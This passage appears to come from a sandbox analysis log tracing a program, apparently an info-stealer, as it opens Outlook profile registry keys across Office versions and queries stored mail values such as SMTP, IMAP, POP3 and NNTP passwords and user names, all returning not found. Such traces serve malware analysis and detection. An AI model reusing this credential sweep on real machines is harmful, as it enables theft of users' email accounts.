lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.851] RegCloseKey (hKey=0x488) returned 0x0 [0236.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.851] RegQueryValueExW (in: hKey=0x488, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.851] RegCloseKey (hKey=0x488) returned 0x0 [0236.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.852] RegQueryValueExW (in: hKey=0x488, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.852] RegCloseKey (hKey=0x488) returned 0x0 [0236.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.852] RegQueryValueExW (in: hKey=0x488, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.852] RegCloseKey (hKey=0x488) returned 0x0 [0236.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x488) returned 0x0 [0236.852] RegQueryValueExW (in: hKey=0x488, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.852] RegCloseKey (hKey=0x488) returned 0x0 [0236.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\18.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x488) returned 0x0 [0236.852] RegQueryInfoKeyW (in: hKey=0x488, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.853] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x484, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.861] RegQueryValueExW (in: hKey=0x484, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.861] RegCloseKey (hKey=0x484) returned 0x0 [0236.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.862] RegQueryValueExW (in: hKey=0x484, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.862] RegCloseKey (hKey=0x484) returned 0x0 [0236.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.862] RegQueryValueExW (in: hKey=0x484, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.862] RegCloseKey (hKey=0x484) returned 0x0 [0236.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.862] RegQueryValueExW (in: hKey=0x484, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.862] RegCloseKey (hKey=0x484) returned 0x0 [0236.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.862] RegQueryValueExW (in: hKey=0x484, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.862] RegCloseKey (hKey=0x484) returned 0x0 [0236.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x484, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.863] RegCloseKey (hKey=0x484) returned 0x0 [0236.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x484, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.863] RegCloseKey (hKey=0x484) returned 0x0 [0236.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x484, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.863] RegCloseKey (hKey=0x484) returned 0x0 [0236.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x484, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.863] RegCloseKey (hKey=0x484) returned 0x0 [0236.863] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x484, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.864] RegCloseKey (hKey=0x484) returned 0x0 [0236.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x484, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.864] RegCloseKey (hKey=0x484) returned 0x0 [0236.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x484, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.864] RegCloseKey (hKey=0x484) returned 0x0 [0236.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x484, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.864] RegCloseKey (hKey=0x484) returned 0x0 [0236.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x484, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.864] RegCloseKey (hKey=0x484) returned 0x0 [0236.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.865] RegQueryValueExW (in: hKey=0x484, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.865] RegCloseKey (hKey=0x484) returned 0x0 [0236.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.865] RegQueryValueExW (in: hKey=0x484, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.865] RegCloseKey (hKey=0x484) returned 0x0 [0236.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.865] RegQueryValueExW (in: hKey=0x484, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.865] RegCloseKey (hKey=0x484) returned 0x0 [0236.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.865] RegQueryValueExW (in: hKey=0x484, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.865] RegCloseKey (hKey=0x484) returned 0x0 [0236.865] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.866] RegQueryValueExW (in: hKey=0x484, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.866] RegCloseKey (hKey=0x484) returned 0x0 [0236.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.866] RegQueryValueExW (in: hKey=0x484, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.866] RegCloseKey (hKey=0x484) returned 0x0 [0236.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.866] RegQueryValueExW (in: hKey=0x484, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.866] RegCloseKey (hKey=0x484) returned 0x0 [0236.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.866] RegQueryValueExW (in: hKey=0x484, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.866] RegCloseKey (hKey=0x484) returned 0x0 [0236.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.866] RegQueryValueExW (in: hKey=0x484, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.866] RegCloseKey (hKey=0x484) returned 0x0 [0236.867] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.867] RegQueryValueExW (in: hKey=0x484, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.867] RegCloseKey (hKey=0x484) returned 0x0 [0236.867] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.867] RegQueryValueExW (in: hKey=0x484, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.867] RegCloseKey (hKey=0x484) returned 0x0 [0236.867] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.867] RegQueryValueExW (in: hKey=0x484, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.867] RegCloseKey (hKey=0x484) returned 0x0 [0236.867] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.867] RegQueryValueExW (in: hKey=0x484, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.867] RegCloseKey (hKey=0x484) returned 0x0 [0236.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x484) returned 0x0 [0236.868] RegQueryValueExW (in: hKey=0x484, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.868] RegCloseKey (hKey=0x484) returned 0x0 [0236.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\19.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x484) returned 0x0 [0236.868] RegQueryInfoKeyW (in: hKey=0x484, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.868] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x528, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.872] RegQueryValueExW (in: hKey=0x528, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.872] RegCloseKey (hKey=0x528) returned 0x0 [0236.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.872] RegQueryValueExW (in: hKey=0x528, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.872] RegCloseKey (hKey=0x528) returned 0x0 [0236.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.872] RegQueryValueExW (in: hKey=0x528, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.873] RegCloseKey (hKey=0x528) returned 0x0 [0236.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.873] RegQueryValueExW (in: hKey=0x528, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.873] RegCloseKey (hKey=0x528) returned 0x0 [0236.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.873] RegQueryValueExW (in: hKey=0x528, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.873] RegCloseKey (hKey=0x528) returned 0x0 [0236.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.873] RegQueryValueExW (in: hKey=0x528, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.873] RegCloseKey (hKey=0x528) returned 0x0 [0236.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.873] RegQueryValueExW (in: hKey=0x528, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.874] RegCloseKey (hKey=0x528) returned 0x0 [0236.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.874] RegQueryValueExW (in: hKey=0x528, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.874] RegCloseKey (hKey=0x528) returned 0x0 [0236.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x528) returned 0x0 [0236.874] RegQueryValueExW (in: hKey=0x528, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.874] RegCloseKey (hKey=0x528) returned 0x0 [0236.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\20.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 